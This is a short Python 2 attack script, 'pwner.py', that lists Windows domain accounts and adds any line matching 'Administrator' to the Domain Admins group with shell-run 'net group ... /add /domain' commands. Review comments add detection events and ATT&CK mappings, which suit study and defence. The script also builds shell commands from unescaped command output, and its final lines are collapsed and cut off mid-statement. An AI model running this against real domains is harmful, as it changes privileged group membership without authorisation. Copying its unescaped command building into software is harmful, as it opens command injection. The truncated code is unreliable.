pwner.py
#!/usr/bin/python
import os
import sys
import argparse
import subprocess
from subprocess import Popen, PIPE, STDOUT
# exploit(target): list domain accounts with `net user /domain` and, for every
# output line containing "Administrator", run
# `net group "Domain Admins" "<line text>" /add /domain`.
# NOTE(review): `target` is never referenced in the body. Both commands are
# handed to a local shell, so they act on the domain of the host running the
# script rather than on the host named on the command line.
# NOTE(review): the group change presumably succeeds only when the caller
# already holds rights to modify Domain Admins; this is a privileged
# directory change, not a bypass of access control - confirm.
# Detection: process-creation logging (Security event 4688 with command line,
# or Sysmon event 1) records net.exe / net1.exe with "Domain Admins" and /add;
# domain controllers log Security event 4728 when a member is added to a
# security-enabled global group. Maps to ATT&CK T1087.002 and T1098.
# The print statements below are Python 2 syntax.
def exploit(target):
try:
# List the accounts in the current domain.
command = 'net user /domain'
# shell=True hands the string to the command interpreter; stderr is merged into stdout.
process = Popen(command, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)
# Read the whole output; stdin is piped but never written to or closed here.
output = process.stdout.read()
# Split the output into lines so we can iterate over them.
lines = output.split('\n')
# Select lines by substring only; no group membership or privilege is checked.
for line in lines:
if 'Administrator' in line: # substring test on the raw output line
username = line[0:-1] # the whole line minus its final character, not a parsed account name
print '[+] Found Administrator Account : %s' % (username) # Report the selected text.
cmd_str = 'net group "Domain Admins" "%s" /add /domain' % (username) # raw output text is interpolated, unescaped, into a shell command string
print '[+] Adding User To Domain Admins Group : %s' % (cmd_str) # Report the command about to run.
# NOTE(review): the page has collapsed the following statements onto the next two
# lines and cut the last one off, so their original nesting cannot be recovered here.
# The call's return code is not checked.
subprocess.call(cmd_str, shell=True) # Execute our new command! print '[+] Exploit Completed!'
except Exception as e: print '[-] Something went wrong :(' print e sys.exit(-1) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("target", help="Target IP or Hostname") args = parser.parse_args() exploit(args